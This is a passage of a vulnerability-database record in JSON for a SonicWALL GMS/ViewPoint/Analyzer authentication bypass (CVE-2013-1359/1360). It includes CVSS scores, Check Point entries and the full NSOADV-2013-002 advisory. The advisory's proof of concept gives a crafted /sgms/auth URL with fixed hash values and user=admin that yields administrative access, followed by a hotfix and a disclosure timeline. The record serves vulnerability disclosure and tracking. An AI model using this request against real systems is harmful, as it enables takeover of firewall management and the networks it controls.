"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1359"], "modified": "2013-03-18T00:00:00", "id": "SAINT:C7FDFE5DCFFF03B22ABA033E11C9F99B", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/sonicwall_skipsessioncheck_auth_bypass", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-08-02T10:44:59", "description": "An arbitrary file upload vulnerability has been reported in SonicWALL Products. The vulnerability is due to authentication bypass in the Web Administration interface. A remote attacker could exploit this vulnerability by sending a malicious request to the target server. Successful exploitation of this vulnerability could allow the attacker to upload arbitrary files to the vulnerable system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-07-08T00:00:00", "type": "checkpoint_advisories", "title": "Multiple SonicWALL Products Authentication Bypass (CVE-2013-1359)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-1359"], "modified": "2013-07-23T00:00:00", "id": "CPAI-2013-1808", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-02T18:33:33", "description": "An authentication bypass vulnerability has been reported in SonicWALL Products. The vulnerability is due to authentication bypass in the Web Administration interface. Successful exploitation of this vulnerability would allow remote attackers to gain unauthorized access into the affected system.", "cvss3": {}, "published": "2014-03-31T00:00:00", "type": "checkpoint_advisories", "title": "Multiple SonicWALL Products Authentication Bypass - Ver2 (CVE-2013-1359)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2013-1359"], "modified": "2014-03-31T00:00:00", "id": "CPAI-2014-1290", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-08-11T05:18:57", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2013-01-18T00:00:00", "type": "exploitdb", "title": "SonicWALL GMS/Viewpoint/Analyzer - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2013-1360", "CVE-2013-1360"], "modified": "2013-01-18T00:00:00", "id": "EDB-ID:24203", "href": "https://www.exploit-db.com/exploits/24203", "sourceData": "-------------------------- NSOADV-2013-002 ---------------------------\r\n\r\nSonicWALL GMS/Viewpoint/Analyzer Authentication Bypass (/sgms/)\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n 111101111\r\n 11111 00110 00110001111\r\n 111111 01 01 1 11111011111111\r\n 11111 0 11 01 0 11 1 1 111011001\r\n 11111111101 1 11 0110111 1 1111101111\r\n 1001 0 1 10 11 0 10 11 1111111 1 111 111001\r\n 111111111 0 10 1111 0 11 11 111111111 1 1101 10\r\n 00111 0 0 11 00 0 1110 1 1011111111111 1111111 11 100\r\n 10111111 0 01 0 1 1 111110 11 1111111111111 11110000011\r\n 0111111110 0110 1110 1 0 11101111111111111011 11100 00\r\n 01111 0 10 1110 1 011111 1 111111111111111111111101 01\r\n 01110 0 10 111110 110 0 11101111111111111111101111101\r\n 111111 11 0 1111 0 1 1 1 1 111111111111111111111101 111\r\n 111110110 10 0111110 1 0 0 1111111111111111111111111 110\r\n 111 11111 1 1 111 1 10011 101111111111011111111 0 1100\r\n 111 10 110 101011110010 11111111111111111111111 11 0011100\r\n 11 10 001100 0001 111111111111111111 10 11 11110\r\n 11110 00100 00001 10 1 1111 101010001 11111111\r\n 11101 0 1011 10000 00100 11100 00001101 0\r\n 0110 111011011 0110 10001 101 11110\r\n 1011 1 10 101 000001 01 00\r\n 1010 1 11001 1 1 101 10\r\n 110101011 0 101 11110\r\n 110000011\r\n 111\r\n______________________________________________________________________\r\n______________________________________________________________________\r\n\r\n Title: SonicWALL GMS/Viewpoint/Analyzer\r\n Authentication Bypass (/sgms/)\r\n Severity: Critical\r\n CVE-ID: CVE-2013-1360\r\n CVSS Base Score: 9\r\n Impact: 8.5\r\n Exploitability: 10\r\n CVSS2 Vector: AV:N/AC:L/Au:N/C:P/I:P/A:C\r\n Advisory ID: NSOADV-2013-002\r\n Found Date: 2012-04-26\r\n Date Reported: 2012-12-13\r\n Release Date: 2013-01-17\r\n Author: Nikolas Sotiriu\r\n Website: http://sotiriu.de\r\n Twitter: http://twitter.com/nsoresearch\r\n Mail: nso-research at sotiriu.de\r\n URL: http://sotiriu.de/adv/NSOADV-2013-002.txt\r\n Vendor: DELL SonicWALL (http://www.sonicwall.com/)\r\n Affected Products: GMS\r\n Analyzer\r\n UMA\r\n ViewPoint\r\n Affected Platforms: Windows/Linux\r\n Affected Versions: GMS/Analyzer/UMA 7.0.x\r\n GMS/ViewPoint/UMA 6.0.x\r\n GMS/ViewPoint/UMA 5.1.x\r\n GMS/ViewPoint 5.0.x\r\n GMS/ViewPoint 4.1.x\r\n Remote Exploitable: Yes\r\n Local Exploitable: No\r\n Patch Status: Vendor released a patch (See Solution)\r\n Discovered by: Nikolas Sotiriu\r\n\r\n\r\n\r\nBackground:\r\n===========\r\n\r\nThe SonicWALL\u00ae Global Management System (GMS) provides organizations,\r\ndistributed enterprises and service providers with a powerful and\r\nintuitive solution to centrally manage and rapidly deploy SonicWALL\r\nfirewall, anti-spam, backup and recovery, and secure remote access\r\nsolutions. Flexibly deployed as software, hardware, or a virtual\r\nappliance, SonicWALL GMS offers centralized real-time monitoring, and\r\ncomprehensive policy and compliance reporting. For enterprise customers,\r\nSonicWALL GMS streamlines security policy management and appliance\r\ndeployment, minimizing administration overhead. Service Providers can\r\nuse GMS to simplify the security management of multiple clients and\r\ncreate additional revenue opportunities. For added redundancy and\r\nscalability, GMS can be deployed in a cluster configuration.\r\n\r\n(Product description from Website)\r\n\r\n\r\n\r\nDescription:\r\n============\r\n\r\nDELL SonicWALL GMS/Analyzer/ViewPoint contains a vulnerability that\r\nallows an unauthenticated, remote attacker to bypass the Web interface\r\nauthentication offered by the affected product.\r\n\r\nThe vulnerability is attributed to a broken session handling in the\r\nprocess of password change process of the web application.\r\nchanging in the web application.\r\n\r\nAn attacker may exploit this vulnerability by sending a specially\r\ncrafted request to the SGMS Interface (/sgms/).\r\n\r\nThe attacker gains full administrative access to the interface and\r\nfull control over all managed appliances, which could lead to a full\r\ncompromisation of the organisation.\r\n\r\n\r\n\r\nProof of Concept :\r\n==================\r\n\r\nAccess the following URL to login to the sgms interface:\r\n\r\nhttp://host/sgms/auth?clientHash=765c5e5b571050030b63666663383064663\r\n83761376339303932346163656262&clientHash2=03196ba18cffc80df87a7c9092\r\n4acebb&changePassword=1&user=admin&ctlSGMSDomainId=DMN00000000000000\r\n00000000001\r\n\r\nIf the Console is not directly shown, type any password you\r\nwant in the change password dialog twice and hit submit to login.\r\n\r\nMaybe you need to access the following URL after this process:\r\n\r\nhttp://host/sgms/auth\r\n\r\n\r\n\r\nSolution:\r\n=========\r\n\r\nInstall Hotfix 125076.77. (Download from www.mysonicwall.com)\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n====================\r\n\r\n2012-04-26: Vulnerability found\r\n2012-12-12: Sent the notification and disclosure policy and asked\r\n for a PGP Key (security@sonicwall.com)\r\n2012-12-13: Sent advisory, disclosure policy and planned disclosure\r\n date (2012-12-28) to vendor\r\n2012-12-18: SonicWALL analyzed the finding and wishes to delay the\r\n release to the 3. calendar week 2013.\r\n2012-12-18: Changed release date to 2013-01-17.\r\n2012-12-20: Patch is published\r\n2013-01-17: Release of this advisory", "sourceHref": "https://www.exploit-db.com/download/24203", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

SonicWALL GMS/Viewpoint/Analyzer authentication bypass

Description

Affected Software

Related